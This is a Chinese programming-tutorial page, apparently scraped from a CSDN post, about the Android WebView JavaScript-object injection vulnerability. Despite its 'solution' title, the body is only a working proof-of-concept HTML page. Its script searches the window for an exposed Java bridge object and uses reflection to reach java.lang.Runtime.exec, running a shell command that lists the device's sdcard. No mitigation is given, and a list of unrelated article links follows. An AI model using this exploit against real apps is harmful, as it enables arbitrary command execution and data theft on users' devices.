您现在的位置是：首页 > 移动开发

当前栏目

Android WebView的Js对象注入漏洞解决方案

2023-09-11 14:18:04 时间

http://blog.csdn.net/leehong2005/article/details/11808557/

webview调用以下文件，就可以打印sdcard 文件名

 1 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 2 <html xmlns="http://www.w3.org/1999/xhtml">
 3  <head>
 4   <title> new document </title>
 5   <script >
 6    var i=0;
 7   function getContents(inputStream)  {
 8         var contents = ""+i;
 9         var b = inputStream.read();
10         var i = 1;
11         while(b != -1) {
12             var bString = String.fromCharCode(b);
13             contents += bString;
14             contents += "\n"
15             b = inputStream.read();
16         }
17         i=i+1;
18         return contents;
19        }
20 
21   function execute(cmdArgs){
22          for (var obj in window) {  
23             console.log(obj);
24             if(window[obj]!=null)
25             if ("getClass" in window[obj]) {
26                 console.log("come to here");
27                 //alert(obj);.
28                 return window[obj].getClass().forName("java.lang.Runtime").
29                     getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);  
30              }  
31          }      
32     }
33     var p = execute(["ls","/mnt/sdcard/"]);
34     console.log("come to here  2");
35 
36     document.write(getContents(p.getInputStream()));  
37   </script>
38   <meta name="generator" content="editplus" />
39   <meta name="author" content="" />
40   <meta name="keywords" content="" />
41   <meta name="description" content="" />
42  </head>
43 
44  <body>
45   
46  </body>
47 </html>

猜你喜欢

WEB漏洞攻防 -根据不同数据库类型之间的差异性进行注入
在EXCEL中输出001，002，003……的数字
I/O框架库 libevent 的安装
软考中级（软件设计）----存储系统、总线及系统可靠性
连阿里大神都畏惧的高可用风险
Windows11中访问共享文件夹提示：你不能访问此共享文件夹，因为你组织的安全策略阻止未经身份验证的来宾访问。这些策略可帮助保护你的电脑免受网络上不安全设备或恶意设备的威胁。
[Android Memory] 使用 Eclipse Memory Analyzer 进行堆转储文件分析
VB编程：利用地址偏移访问内存-42_彭世瑜_新浪博客
Professional Numerologist 5.X
第十三届蓝桥杯省赛 C++ A 组 F 题、Java A 组 G题、C组 H 题、Python C 组 I 题——青蛙过河（AC）
CSS选择器笔记
html里调整字间距
[React] Composable component with Context
1553B总线介绍及其硬件方案设计
LeetCode-764. 最大加号标志【动态规划，二维数组】

相关主题

Android RxJava
android 系统jni
android JNI学习
Android环境配置
android事件详解
android ndk
Android Runtime
js中引入js
Android网站
android ART
Android启动篇
Android组件化
Android随笔记
Android版本更新

zl程序教程

当前栏目

Android WebView的Js对象注入漏洞解决方案

相关文章